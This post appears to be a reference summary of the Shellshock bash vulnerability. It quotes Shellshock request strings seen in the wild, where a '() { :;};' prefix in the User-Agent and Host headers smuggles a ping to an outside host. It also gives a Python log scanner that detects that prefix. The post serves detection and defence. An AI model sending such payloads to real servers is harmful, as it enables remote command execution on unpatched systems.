raistlin
14:33

Quick summary on ShellShocker

This post contains no original research, just a few links and info on the ShellShocker bug. I put it together to have a handy reference for friends & co.; feel free to share.

A summary, along with test cases and info:

Attacks going on in the wild:

- Multiple reports of IP addresses scanning for the vulnerability with a consistent user agent: User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138

Request: "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0"
Host: -
UA: "() { :;}; /bin/ping -c 1 198.101.206.138"

Originally this was by Graham at Errata Security (read here), but he has not been scanning for days, so if you still see it, that's not good.
Also, Robert's scanner is polite:
IP: 209.126.230.72
Request: "GET / HTTP/1.0 "
Host: "() { :; }; ping -c 11 209.126.230.74"
UA:  "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"

The pattern above is being used in active exploitation (see also here), and that specific attack drops a bot that a source has connected to past infections of routers (although this version is for x86).
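To check your own logs for the pattern quoted above, here is an added example (not from the original post or from Errata Security) that flags any request field carrying the `() {` function-definition prefix and records the command that follows it. The log layout (`ip "request" "host" "user-agent"`), the sample lines and the two documentation addresses are constructed assumptions; adapt the line regex to your server's format.

```python
import re

# Bash treats a value starting with "() {" as a function definition; vulnerable
# versions also ran whatever followed the closing "}".
PREFIX_RE = re.compile(r"\(\s*\)\s*\{")
TRAILER_RE = re.compile(r"\(\s*\)\s*\{.*?\}\s*;\s*(.*)")
# Assumed log layout (constructed for this example): ip "request" "host" "user-agent"
LINE_RE = re.compile(r'^(\S+) "([^"]*)" "([^"]*)" "([^"]*)"$')
FIELDS = ("request", "host", "user_agent")

# Constructed sample lines modelled on the requests quoted in the post;
# 192.0.2.10 and 203.0.113.5 are documentation addresses.
SAMPLE_LOG = """\
192.0.2.10 "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
209.126.230.72 "GET / HTTP/1.0" "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
203.0.113.5 "GET /index.html HTTP/1.1" "www.example.com" "Mozilla/5.0 (X11; Linux x86_64)"
"""


def scan(log_text):
    """Return one finding per request field that carries the function-definition prefix."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparsable line: skipped here, worth counting in real use
        ip, values = m.group(1), m.groups()[1:]
        # The scanner's UA is self-declared and trivially spoofed: a triage hint only.
        self_identified = "shellshock-scan" in values[2]
        for field, value in zip(FIELDS, values):
            if PREFIX_RE.search(value):
                t = TRAILER_RE.search(value)
                findings.append({
                    "ip": ip,
                    "field": field,
                    "command": t.group(1) if t else None,
                    "self_identified_scan": self_identified,
                })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Matching every field rather than only the User-Agent matters because the second request above carries the payload in the Host header.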
